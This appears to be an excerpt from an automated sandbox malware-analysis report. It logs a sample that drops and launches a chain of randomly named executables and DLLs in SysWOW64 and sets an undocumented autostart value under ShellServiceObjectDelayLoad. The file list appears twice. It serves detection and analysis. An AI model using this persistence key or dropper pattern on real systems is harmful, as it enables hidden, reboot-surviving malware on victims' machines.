                      Source: C:\Windows\SysWOW64\Feidnc32.exeExecutable created and started: C:\Windows\SysWOW64\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Oceoll32.exeExecutable created and started: C:\Windows\SysWOW64\Onkcje32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeExecutable created and started: C:\Windows\SysWOW64\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Olijjb32.exeExecutable created and started: C:\Windows\SysWOW64\Oeanchcn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeExecutable created and started: C:\Windows\SysWOW64\Pqeoao32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeExecutable created and started: C:\Windows\SysWOW64\Cfnpmb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeExecutable created and started: C:\Windows\SysWOW64\Opbieagi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeExecutable created and started: C:\Windows\SysWOW64\Ojacofgb.exeJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeExecutable created and started: C:\Windows\SysWOW64\Nejhbi32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeExecutable created and started: C:\Windows\SysWOW64\Baagdk32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeExecutable created and started: C:\Windows\SysWOW64\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Ccapffke.exeExecutable created and started: C:\Windows\SysWOW64\Ceampi32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Foelkeee.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Oceoll32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Ogjdllpi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Bnnampcf.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Plgflqpn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Ajkolbad.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Hjanmb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Plbmqa32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Bgibkegc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Bdlhdkdf.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Odekfoij.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Accicdme.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Iemjhp32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Dnhmjm32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Lfjejf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Bmlhnnne.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Akghbg32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Jcofqqkm.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ibigijoc.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Jdackq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Chfnmf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Fkdfmkhi.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Ajikgq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Ligdce32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Olijjb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Bnpnbp32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Edgbhcim.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Efgkjnfn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Camgpi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Hdgplo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Ibbpip32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Fkogfkdj.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Ppllkpoo.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Oglabl32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Dmfdkj32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Dfcboo32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Gfdcflnh.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Cnjaioih.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Ekpjke32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Hjjfnehb.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Bqjacldl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Eoappk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Bgamkfnl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Hjdhea32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Lfcadoap.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Kfnpbj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Fcjdhk32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Pfgpqb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Jgemldcp.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ccapffke.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Emogai32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Qgcpihjl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Foaigifk.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Onkcje32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Lbfpda32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Njaakj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Pkjmee32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Mfdadc32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Feidnc32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Clqdacnn.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ckaenpam.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Oeanchcn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Ahhhnd32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ipqipqal.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ggmnlk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Flhljo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Pqeoao32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Fehgpcld.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Cfnpmb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Bpghkh32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Opbieagi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Pdmohf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Ojacofgb.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Ekpkmk32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Nejhbi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Pdkggn32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Baagdk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Fhedeo32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Khlnhl32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ceampi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Foelkeee.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Oceoll32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Ogjdllpi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Bnnampcf.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Plgflqpn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Ajkolbad.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Hjanmb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Plbmqa32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Bgibkegc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Bdlhdkdf.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Odekfoij.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Accicdme.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Iemjhp32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Dnhmjm32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Lfjejf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Bmlhnnne.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Akghbg32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Jcofqqkm.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ibigijoc.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Jdackq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Chfnmf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Fkdfmkhi.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Ajikgq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Ligdce32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Olijjb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Bnpnbp32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Edgbhcim.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Efgkjnfn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Camgpi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Hdgplo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Ibbpip32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Fkogfkdj.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Ppllkpoo.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Oglabl32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Dmfdkj32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Dfcboo32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Gfdcflnh.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Cnjaioih.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Ekpjke32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Hjjfnehb.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Bqjacldl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Eoappk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Bgamkfnl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Hjdhea32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Lfcadoap.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Kfnpbj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Fcjdhk32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Pfgpqb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Jgemldcp.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ccapffke.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Emogai32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Qgcpihjl.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Foaigifk.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Onkcje32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Lbfpda32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Njaakj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Pkjmee32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Mfdadc32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Feidnc32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Clqdacnn.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ckaenpam.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Oeanchcn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Ahhhnd32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ipqipqal.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ggmnlk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Flhljo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Pqeoao32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Fehgpcld.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Cfnpmb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Bpghkh32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Opbieagi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Pdmohf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Ojacofgb.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Ekpkmk32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Nejhbi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Pdkggn32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Baagdk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Fhedeo32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Khlnhl32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ceampi32.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\Desktop\h879iieoae.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Web Event LoggerJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Web Event LoggerJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Foelkeee.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Hjanmb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Jgemldcp.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Bdlhdkdf.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Accicdme.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Iemjhp32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Eoappk32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Lbfpda32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Njaakj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Pkjmee32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Akghbg32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Lfjejf32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Jcofqqkm.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ibigijoc.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Mfdadc32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Jdackq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Clqdacnn.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ckaenpam.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Chfnmf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ahhhnd32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Fkdfmkhi.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ajikgq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ligdce32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ipqipqal.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ggmnlk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Hdgplo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Flhljo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ibbpip32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Fehgpcld.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Bpghkh32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Gfdcflnh.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Pdmohf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ceampi32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Hjjfnehb.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ekpjke32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Ekpkmk32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Pdkggn32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Hjdhea32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Kfnpbj32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Lfcadoap.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Khlnhl32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Pfgpqb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Fcjdhk32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Opbieagi.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oglabl32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Olijjb32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oceoll32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Onkcje32.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Odekfoij.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeAPI coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeAPI coverage: 8.3 %
